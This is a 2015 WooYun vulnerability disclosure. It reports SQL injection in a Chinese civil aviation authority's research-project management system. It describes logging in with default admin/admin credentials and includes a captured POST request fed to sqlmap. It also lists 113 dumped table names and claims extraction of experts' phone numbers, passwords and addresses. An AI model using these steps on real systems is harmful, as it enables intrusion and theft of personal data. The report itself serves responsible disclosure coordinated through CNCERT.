当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139550

漏洞标题:中国民航总局某系统多处SQL注入漏洞打包

相关厂商:中国民航总局科技管理系统

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-09 16:59

修复时间:2015-10-26 14:36

公开时间:2015-10-26 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

233333

详细说明:

URL:
**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/Login.aspx
用admin/admin登陆
所有输入框几乎都有注入。。。。也是醉了。。。

1.png


2.png


3.png


4.png


5.png


就不一一列出来了

漏洞证明:

注入点太多只证明一个注入的数据,抓post包放入sqlmap

POST /%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
__VIEWSTATE=
%2FwEPDwUKMTMyODY0NTA4Mw9kFgICAw9kFgYCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQV5ZWFycx4ORGF0YVZhbHVlRmllbGQFBXllYXJzHgtfIURhdGFCb3VuZGdkEBULBuWFqOmDqAQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEM
jAwOQQyMDA4BDIwMDcEMjAwNgQyMDA1FQsDYWxsBDIwMTUEMjAxNAQyMDEzBDIwMTIEMjAxMQQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUUKwMLZ2dnZ2dnZ2dnZ2dkZAIJDzwrAA0BAA8WBB8CZx4LXyFJdGVtQ291bnQCAWQWAmYP
ZBYCAgIPDxYCHgdWaXNpYmxlaGRkAg0PDxYEHg5DdXN0b21JbmZvVGV4dAV96K6w5b2V5oC75pWw77yaPGZvbnQgY29sb3I9ImJsYWNrIj4wPC9mb250PiDmgLvpobXmlbDvvJo8Zm9udCBjb2xvcj0iYmxhY2siPjE8L2ZvbnQ
%2BIOW9k%2BWJjemhte%2B8mjxmb250IGNvbG9yPSJibGFjayI%2BMTwvZm9udD4eC1JlY29yZGNvdW50ZmRkGAEFBWdkdlhNDxQrAApkZGRkZGQVAQNQSUQUKwABFCsAATJmAAEAAAD%2F%2F%2F%2F
%2FAQAAAAAAAAAEAQAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEICgIAAAAGAgAAAAALAgEUKwABMmYAAQAAAP%2F%2F%2F
%2F8BAAAAAAAAAAQBAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgKAgAAAAYCAAAAAAtk0e8oSugqA4TDpriRNs8%2BkXA2PJY
%3D&__EVENTVALIDATION=%2FwEWEQLTwK2rCQLmmee%2FCQL4wa6BDQL4wbLkBAL4wYbfAwL4weqyCwL4wf6VAgKT%2BPDRDgKT%2BMS0BgKT%2BOhdApP4%2FLAIApP4wOsHAv%2FBw40DAq%2FQlx0C%2F%2FDzmAYC
%2FPDzmAYCu6uxhgjTs1eYRKV%2BpJ9s2Nrxlj2O55eRLw%3D%3D&ddlYear=all&txtXMName=123&ddlStatus=all&Button2=%E6%9F%A5%E8%AF%A2


DBA权限

dba.png


8个库

8个库.png


当前数据库113个表

[113 tables]
+-------------------------------+
| 123 |
| ApplicationUnit |
| CompactList_View |
| Conceit |
| ConceitTime |
| Department |
| ExperUserMaster |
| ExperUserPaper |
| ExperUserResults |
| Function |
| HY_LoginExperUser |
| JDYJ_View |
| JD_Input |
| JD_Project_view |
| Location |
| PJExpertNew_View |
| PJExpert_View |
| PJ_Project_View |
| PJ_View |
| PingJiang_SCCS |
| PingJiang_View |
| PingJing_SCCS_View |
| PingShenView |
| Project |
| ProjectList_View |
| ProjectPeople |
| ProjectPeopleView |
| Project_SCCS |
| Project_SCCS_View |
| Project_expert |
| Project_ry |
| QUERY_PARA |
| Role |
| Role_Function |
| SB_Search_View |
| Sheet1$ |
| Users |
| VIEW1 |
| VIEW_zaiyan |
| ViewCompact |
| ViewCompact111111111 |
| ViewContract |
| ViewDepartment |
| ViewProject |
| ViewSPContract |
| View_CheckZJPS |
| View_Contract_JD |
| View_JianDing |
| View_ZJ |
| compact |
| compact_htxx |
| compact_xmid |
| config |
| dtproperties |
| expert |
| expertJob |
| expertcount |
| gather |
| ht_config |
| ht_jfys |
| ht_sbyq |
| ht_xm |
| ht_xmjdap |
| ht_xmry |
| huojiang |
| jianding |
| jiandingapply |
| jiandingexpert |
| jindubaogao |
| jindubaogao_Attitude |
| jindubaogao_AttitudeFile |
| jindubaogao_AttitudeFile_View |
| jindubaogao_Attitude_View |
| jindufujian |
| pingjiang |
| pingjiangTime |
| pingshenyijian |
| pj_Conceit |
| pj_config |
| pj_expertCount |
| pj_expertJob |
| pj_project_expert |
| projectView |
| project_conceit |
| project_rkx |
| project_temp |
| projectbak |
| sysdiagrams |
| tp3_jfys |
| tp3_sbyq |
| tp3_xm |
| tp3_xmDW |
| tp3_xmHXR |
| tp3_xmjdap |
| tp3_xmry |
| tp3_xmtzze |
| tp4_jfys |
| tp4_xm |
| tp4_xmry |
| tp4_xmry_xmqk |
| tp5_XM |
| tp5_xmhjqk |
| tp5_xmwcdw |
| tp5_xmzywcr |
| v_contract |
| v_project |
| v_user_dept |
| viewjianding |
| viewjiandingapply |
| viewjindu |
| xiangmulist |
| xm_pingjiang |
| zaiyan |
+-------------------------------+


专家的手机,用户名,密码,住址等等信息

信息.png


由于跑数据太慢就跑个几个用户名密码证明下

专家密码.png

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-11 14:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。同时同步上报给国家上级信息安全协调机构。

最新状态:

暂无